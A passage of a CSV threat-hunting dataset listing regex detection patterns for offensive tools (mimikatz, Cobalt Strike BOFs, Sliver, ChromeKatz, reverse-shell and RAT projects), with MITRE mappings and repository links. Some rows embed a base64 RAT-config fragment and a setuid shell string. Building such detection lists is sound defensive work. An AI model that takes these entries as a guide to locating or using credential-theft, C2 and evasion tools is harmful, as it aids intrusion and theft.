OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*chocobo_root.c",".{0,1000}chocobo_root\.c","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*chocolate.kirbi*",".{0,1000}chocolate\.kirbi.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802*",".{0,1000}chompie1337\/Windows_MSKSSRV_LPE_CVE\-2023\-36802.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","1","N/A","10","2","147","39","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z" "*Choose The RPC Function [1]VpnProtEngWinRtConnect [2]VpnProtEngGetInterface*",".{0,1000}Choose\sThe\sRPC\sFunction\s\[1\]VpnProtEngWinRtConnect\s\[2\]VpnProtEngGetInterface.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege 
Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*Choosing DLL to hijack.*",".{0,1000}Choosing\sDLL\sto\shijack\..{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*chop target username password domain filename chd wmi*",".{0,1000}chop\starget\susername\spassword\sdomain\sfilename\schd\swmi.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*chopper.exe -m*",".{0,1000}chopper\.exe\s\-m.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*chopper.exe -s*",".{0,1000}chopper\.exe\s\-s.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*chopper.exe -w*",".{0,1000}chopper\.exe\s\-w.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement 
attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*chown root %s chmod 4755 %s %s*",".{0,1000}chown\sroot\s\%s\s\schmod\s4755\s\%s\s\s\%s.{0,1000}","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Shell spawning","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*chrismaddalena/SharpCloud*",".{0,1000}chrismaddalena\/SharpCloud.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","159","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*chrispetrou/HRShell*",".{0,1000}chrispetrou\/HRShell.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*christophetd/spoofing-office-macro*",".{0,1000}christophetd\/spoofing\-office\-macro.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","1","N/A","9","4","371","86","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z" "*chrome_creds.txt*",".{0,1000}chrome_creds\.txt.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*chromecertbeggar.js*",".{0,1000}chromecertbeggar\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*chromecertbeggar2.js*",".{0,1000}chromecertbeggar2\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*chrome-dump.dll*",".{0,1000}chrome\-dump\.dll.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ChromeDump.git*",".{0,1000}ChromeDump\.git.{0,1000}","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" "*chromedump.py*",".{0,1000}chromedump\.py.{0,1000}","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" "*chrome-dump.x86.dll*",".{0,1000}chrome\-dump\.x86\.dll.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ChromeDump-main.zip*",".{0,1000}ChromeDump\-main\.zip.{0,1000}","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" "*ChromeKatz/Memory.cpp*",".{0,1000}ChromeKatz\/Memory\.cpp.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*ChromeKatz/Process.cpp*",".{0,1000}ChromeKatz\/Process\.cpp.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*ChromeKatz\Memory.cpp*",".{0,1000}ChromeKatz\\Memory\.cpp.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*ChromeKatz\Process.cpp*",".{0,1000}ChromeKatz\\Process\.cpp.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*chromeKey.x64*",".{0,1000}chromeKey\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*chromeKey.x86*",".{0,1000}chromeKey\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*chromepass.exe*",".{0,1000}chromepass\.exe.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*chromepass.zip*",".{0,1000}chromepass\.zip.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. 
or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*chromiumkeydump *",".{0,1000}chromiumkeydump\s.{0,1000}","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","0","N/A","N/A","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*chromiumkeydump*",".{0,1000}chromiumkeydump.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" 
"*ChromiumKeyDump.cna*",".{0,1000}ChromiumKeyDump\.cna.{0,1000}","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*ChromiumKeyDump.cpp*",".{0,1000}ChromiumKeyDump\.cpp.{0,1000}","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*ChromiumKeyDump.exe*",".{0,1000}ChromiumKeyDump\.exe.{0,1000}","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*Chudry/Xerror*",".{0,1000}Chudry\/Xerror.{0,1000}","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","494","109","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" "*chunlie.exe*",".{0,1000}chunlie\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*cHux014r17SG3v4gPUrZ0BZjDabMTY2eWDj1tuYdREBg*",".{0,1000}cHux014r17SG3v4gPUrZ0BZjDabMTY2eWDj1tuYdREBg.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*chvancooten/nimbuild*",".{0,1000}chvancooten\/nimbuild.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*chvancooten/NimPlant*",".{0,1000}chvancooten\/NimPlant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" 
"*chvancooten/OSEP-Code-Snippets*",".{0,1000}chvancooten\/OSEP\-Code\-Snippets.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*cilbuP\\sresU\\:C*",".{0,1000}cilbuP\\\\sresU\\\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cilbuP\sresU\:C*",".{0,1000}cilbuP\\sresU\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*CIMplant.exe *",".{0,1000}CIMplant\.exe\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*CIMplant.sln*",".{0,1000}CIMplant\.sln.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" 
"*CIMplant-main*",".{0,1000}CIMplant\-main.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*cirt-default-usernames.txt*",".{0,1000}cirt\-default\-usernames\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cirt-fuzzer*",".{0,1000}cirt\-fuzzer.{0,1000}","offensive_tool_keyword","cirt-fuzzer","A simple TCP/UDP protocol fuzzer.","T1046 - T1065 - T1190 - T1219 - T1221 - T1497","TA0001 - TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Sniffing & Spoofing","https://www.ecrimelabs.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cisco2john.pl*",".{0,1000}cisco2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*CiscoCXSecurity/linikatz*",".{0,1000}CiscoCXSecurity\/linikatz.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","1","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" 
"*cisco-phone-query.sh*",".{0,1000}cisco\-phone\-query\.sh.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*citronneur/pamspy*",".{0,1000}citronneur\/pamspy.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*citronneur/pamspy/releases*",".{0,1000}citronneur\/pamspy\/releases.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cjelfplplebdjjenllpjcblmjkfcffne*",".{0,1000}cjelfplplebdjjenllpjcblmjkfcffne.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*cjm00n/EvilSln*",".{0,1000}cjm00n\/EvilSln.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","1","N/A","10","5","402","56","2023-10-30T06:57:24Z","2023-10-11T07:39:59Z" 
"*Ck5PX0lQX0hPU1QgPSAnZ29vZ2xlY2hyb21lYXV0by5zZXJ2ZWlyYy5jb20nCkxIT1NUID0gJzE5Mi4xNjguMS4zJwpMUE9SVCA9IDQ0MwpUSU1FX1NMRUVQID0gMTAKClRFTVBfUEFUSCA9IHRlbXBmaWxlLmdldHRlbXBkaXIoKQpSRUdfUEFUSCA9IHIiU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuIgpSRUdfTkFNRSA9ICJHb29nbGVDaHJvbWVBdXRvTGF1bmNoXzk5MjEzNjYxMDJXRUFEMjEzMTJFU0FEMzEzMTIiClJFR19WQUxVRSA*",".{0,1000}Ck5PX0lQX0hPU1QgPSAnZ29vZ2xlY2hyb21lYXV0by5zZXJ2ZWlyYy5jb20nCkxIT1NUID0gJzE5Mi4xNjguMS4zJwpMUE9SVCA9IDQ0MwpUSU1FX1NMRUVQID0gMTAKClRFTVBfUEFUSCA9IHRlbXBmaWxlLmdldHRlbXBkaXIoKQpSRUdfUEFUSCA9IHIiU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuIgpSRUdfTkFNRSA9ICJHb29nbGVDaHJvbWVBdXRvTGF1bmNoXzk5MjEzNjYxMDJXRUFEMjEzMTJFU0FEMzEzMTIiClJFR19WQUxVRSA.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","base64","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*class 